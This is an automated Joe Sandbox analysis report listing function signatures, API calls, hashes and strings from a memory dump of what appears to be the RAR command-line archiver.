• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
• String ID:
• API String ID: 4044681568-0
• Opcode ID: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
• Instruction ID: d24e129626aea37349382c5e23b96d385950e42f4bd5e963407395c454517dd7
• Opcode Fuzzy Hash: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
• Instruction Fuzzy Hash: 0501B002E1E18206FF18B3B5E4A67B914828FA1310F438179F51D8A3D7DD9F2426C35B
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
• Instruction ID: e294ac3c743b7b7cdc3d7e4ad9b3ff28142027bd3b2ea61cd1681d6d7d95fb3c
• Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
• Instruction Fuzzy Hash: FA018E23A08682C2EF649B69E4443782360EB64778F154331F13D852E5CFAED9ABC705
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetFileAttributesW.KERNELBASE(00000800,00007FF6EE75305D,?,?,?,?,?,?,?,?,00007FF6EE764126,?,?,?,?,00000800), ref: 00007FF6EE7530F0
• GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF6EE764126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF6EE753119
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
• Instruction ID: 333383148a185bdc9f5f720b91e761140e2c562198370ee1bd79b59918651985
• Opcode Fuzzy Hash: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
• Instruction Fuzzy Hash: CFF0A422B1868181EF609B25F4443AD6250BB6C7D4F410531F9DCC379DDEAED594C609
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: DirectoryLibraryLoadSystem
• String ID:
• API String ID: 1175261203-0
• Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
• Instruction ID: 5249407879d82bc38840a51b9a303771246944a08a44046d34e06ef3f7427254
• Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
• Instruction Fuzzy Hash: 65F06823B1858145FF709B10E8153F96254FF68784F810031F9CDC269DEE6DD165C605
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: Process$AffinityCurrentMask
• String ID:
• API String ID: 1231390398-0
• Opcode ID: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
• Instruction ID: cd5e36cedcf185fac1a7789750517dd81c3ab09a03ed711a7cef5b845be92eaf
• Opcode Fuzzy Hash: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
• Instruction Fuzzy Hash: 86E02B22B3445146DFD89719D495FAD2391EF64B80F812035F44FC3A54ED5EC454CB05
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: ErrorLastPrivilegeRelease
• String ID:
• API String ID: 1334314998-0
• Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
• Instruction ID: 4c4b8bc472ade058ca5e5ac8b74dda2bda1173c3dfba63268fdc0b0e5d4a4795
• Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
• Instruction Fuzzy Hash: 0FE04F73E1918342FF1497B2D4443741291AF64745F474434F90DCA255FEAFA4A1C24E
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 7b45582bae7dd69f792145e90e6da2b9b411708c317b45820f8f66ef8b840033
                                                                                                                                                                      • Instruction ID: b4c118e172428d0edd128365f40e121a13f162b0efa7ae5a548345e38dd4265c
                                                                                                                                                                      • Opcode Fuzzy Hash: 7b45582bae7dd69f792145e90e6da2b9b411708c317b45820f8f66ef8b840033
                                                                                                                                                                      • Instruction Fuzzy Hash: D7E1D423A0C68241FF209A20D4443B92751EF61B8BF064135FE4DCB7DADEAEA475C71A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c86521b1d8875bcba69ce37d260f22ca13c49f0672248d2e89784453983af802
• Instruction ID: 17408bd306b60f89a47a448866f862f313a4647931594f6bd873ddc025782545
• Opcode Fuzzy Hash: c86521b1d8875bcba69ce37d260f22ca13c49f0672248d2e89784453983af802
• Instruction Fuzzy Hash: 6B514973528BD195EB009F24E8442ED37A8F754F88F19423AEB884B79ADF795061C336
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: HandleModule$AddressFreeLibraryProc
• String ID:
• API String ID: 3947729631-0
• Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
• Instruction ID: d65239e719089890ac6bffecdb56db627a600ed8224b913e1bb595770a05a88c
• Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
• Instruction Fuzzy Hash: C6416023A0968382FF68AB65E4503782251AFA0744F074439F90D877A5DFBFE865C74A
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 81a00aba03bed044d944170de60365d76bbe78fde453a36ffdf0bcb9fcb17f33
• Instruction ID: f18c15483cc413971633b5fb48657849badcdfc1286ceba483c6131a03b54d00
• Opcode Fuzzy Hash: 81a00aba03bed044d944170de60365d76bbe78fde453a36ffdf0bcb9fcb17f33
• Instruction Fuzzy Hash: C911293391C68682FB109B94F54073962A4EF61380F570135F68D87696DFBFE860CB0A
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: CommandLine
• String ID:
• API String ID: 3253501508-0
• Opcode ID: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
• Instruction ID: 4423f8439d0b3dbd561244a2335d0a2bc6674b2e1e27077b4171d3717c47cbb8
• Opcode Fuzzy Hash: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
• Instruction Fuzzy Hash: 2C01C81360C94245EF10B716E40037D5661BF65794F4A0432FF4D47365EE7ED4A2D70A
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: cd8da7e225d4e054d7198354b045464c529c48aefb4b06018a4c08b75c41078c
• Instruction ID: 38ad4a5b2a2b56bb81771ecbf8277686d1cd7f2294f7cf6b43f07f37954ae7c1
• Opcode Fuzzy Hash: cd8da7e225d4e054d7198354b045464c529c48aefb4b06018a4c08b75c41078c
• Instruction Fuzzy Hash: A1018C23A0C6C240FF24A666D68037911905F65BD0F0B8230FD1DC62D6FD9FA4A1C20E
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                      • Opcode ID: c516406bf9b650796cf782c2d93797a14115aaa58b2b73e6f8591929e1e8cc7b
                                                                                                                                                                      • Instruction ID: c558df422494566a1d2e436d544b0384aa5352f731067b8dd3878b2c51e51bd1
                                                                                                                                                                      • Opcode Fuzzy Hash: c516406bf9b650796cf782c2d93797a14115aaa58b2b73e6f8591929e1e8cc7b
                                                                                                                                                                      • Instruction Fuzzy Hash: 4CF0AF36B0928341FF545665C5803B412801F68B80F4F5430E90DC67D1FE9FE8E0C21A
Uniqueness

Uniqueness Score: -1.00%

APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
• Opcode ID: 37315976747a324bc4a89ca9f4e050d50d4baea4dbab69f22b0b8f40f318d585
• Instruction ID: d066054e41a05b52b90582ff78c4a2aa5c00c55fd32fa14f73dd02e8fb1c9ae1
• Opcode Fuzzy Hash: 37315976747a324bc4a89ca9f4e050d50d4baea4dbab69f22b0b8f40f318d585
• Instruction Fuzzy Hash: 95F062229082C146DF119B71D1013E82750AB16BF8F094335EE7D4B2DBDE9A90E8D726
Uniqueness

Uniqueness Score: -1.00%

APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
• Instruction ID: ae1e11f1a249179eb4cea01df51bf038c6731de4e1581dd11e5a63f5a7507fff
• Opcode Fuzzy Hash: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
• Instruction Fuzzy Hash: 51F03033A4928240FF549A61D48137512809F647A0F4B0631FD2DC92C1FEDFE4A1C11E
Uniqueness

Uniqueness Score: -1.00%

APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
• Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
• Instruction ID: 162ec28e31be48cd05ca75872792035eb19b0d64ab063ec618e2acd9a63a9018
• Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
• Instruction Fuzzy Hash: 43F02863A08BC295FF248B20E0403B43251DB20B79F5A5330E23D850D8CFA9C8B6C356
Uniqueness

Uniqueness Score: -1.00%

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
• Instruction ID: 30856cc02a4eccb6c2de5f1483d34c1793fb5d5987d2faf4278b86d43feff0c2
• Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
• Instruction Fuzzy Hash: B1E04F52F2930360EF58262298512BD02401FB6B84E165438EC1F86382EC5FA4B5DB6A
Uniqueness

Uniqueness Score: -1.00%

APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
• Opcode ID: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
• Instruction ID: 7a3631d0630dc34a9407b42dd33c7a9c015795302873286ea5bef30e7f7d92a6
• Opcode Fuzzy Hash: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
• Instruction Fuzzy Hash: 07D0176BE1A90385FF04CB80E8443301265AF3639AF830634E40C88150CFEF6064CA0A
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindClose.KERNELBASE(00000000,?,00000000,?,00007FF6EE777A8C), ref: 00007FF6EE754549
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
• Opcode ID: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
• Instruction ID: 1633531f10005b9d27d5bd6a2415a853488dcbe3bbe21812f5d609cccc3ba8d3
• Opcode Fuzzy Hash: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
• Instruction Fuzzy Hash: 31C02B23E0148180CF04532DD8452341110BF54735FE00330F13E451E0CF9940FF8305
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00007FF6EE7749F4: LoadStringW.USER32 ref: 00007FF6EE774A7B
  • Part of subcall function 00007FF6EE7749F4: LoadStringW.USER32 ref: 00007FF6EE774A94
  • Part of subcall function 00007FF6EE77B6D0: Sleep.KERNEL32(?,?,?,?,00007FF6EE74CBED,?,00000000,?,00007FF6EE777A8C), ref: 00007FF6EE77B730
• swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6EE756CB0
Strings
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: LoadString$Sleepfflushswprintf
• String ID: %12ls: %ls$%12ls: %ls$%21ls %-16ls %u$%21ls %9ls %3d%% %-27ls %u$%s: $%s: %s$----------- --------- -------- ----- ---------- ----- -------- ----$----------- --------- ---------- ----- ----$%.10ls %u$%21ls %18s %lu$%21ls %9ls %3d%% %28ls %u$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$EOF$RAR 1.4$RAR 4$RAR 5$V
• API String ID: 668332963-4283793440
• Opcode ID: 1809d281e11e57368e542bccbc1a8fe66159deefba3bd9b4622a4842c6b2ef32
• Instruction ID: 7b3ea63ebc94451bdd0034caec71bf7752c848abda2dc4a8c3048d7607e295ac
• Opcode Fuzzy Hash: 1809d281e11e57368e542bccbc1a8fe66159deefba3bd9b4622a4842c6b2ef32
• Instruction Fuzzy Hash: 7322E523A0C6C255FF20DB64E8402F967A1FF61344F460036F64D8769ADEBEE569C70A
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6EE732E4C), ref: 00007FF6EE77AEE9
• GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6EE732E4C), ref: 00007FF6EE77AF01
• GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6EE732E4C), ref: 00007FF6EE77AF19
• GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6EE732E4C), ref: 00007FF6EE77AF75
• GetFullPathNameA.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6EE732E4C), ref: 00007FF6EE77AFB0
• SetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6EE732E4C), ref: 00007FF6EE77B23B
• FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6EE732E4C), ref: 00007FF6EE77B244
• FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6EE732E4C), ref: 00007FF6EE77B287
Strings
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: AddressProc$CurrentDirectoryFreeLibrary$FullNamePath
• String ID: MAPI32.DLL$MAPIFreeBuffer$MAPIResolveName$MAPISendMail$SMTP:
• API String ID: 3483800833-4165214152
• Opcode ID: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
• Instruction ID: c89d33d4942a49d6e90acd2bf04f192086e02c8cb16f77cae39d8b2adf83ac10
• Opcode Fuzzy Hash: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
• Instruction Fuzzy Hash: EEC18E23A09A8285EF20DF21E8403AD37A1FB64794F460035FA4D87799EFBED565C709
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: ExitProcessTokenWindows$AdjustCurrentLookupOpenPrivilegePrivilegesValue
• String ID: SeShutdownPrivilege
• API String ID: 3729174658-3733053543
• Opcode ID: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
• Instruction ID: 3641731fa419145691e72f56fd7156ece0f42a93fdd522013829378079dc66a0
• Opcode Fuzzy Hash: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
• Instruction Fuzzy Hash: 9521F633A1860242FF908B20E45537B7762FBA4704F525035F64E8659CDFBED469C709
Uniqueness
• Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNEL32(?,?,?,00000001,?,00007FF6EE732014), ref: 00007FF6EE74E298
• FindClose.KERNEL32(?,?,?,00000001,?,00007FF6EE732014), ref: 00007FF6EE74E2AB
• CreateFileW.KERNEL32(?,?,?,00000001,?,00007FF6EE732014), ref: 00007FF6EE74E2F7
  • Part of subcall function 00007FF6EE74EF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6EE74EE47), ref: 00007FF6EE74EF73
  • Part of subcall function 00007FF6EE74EF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF6EE74EE47), ref: 00007FF6EE74EF84
  • Part of subcall function 00007FF6EE74EF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6EE74EFA7
  • Part of subcall function 00007FF6EE74EF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF6EE74EFCA
  • Part of subcall function 00007FF6EE74EF50: GetLastError.KERNEL32 ref: 00007FF6EE74EFD4
  • Part of subcall function 00007FF6EE74EF50: CloseHandle.KERNEL32 ref: 00007FF6EE74EFE7
• DeviceIoControl.KERNEL32 ref: 00007FF6EE74E357
• CloseHandle.KERNEL32(?,?,?,00000001,?,00007FF6EE732014), ref: 00007FF6EE74E362
Strings
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
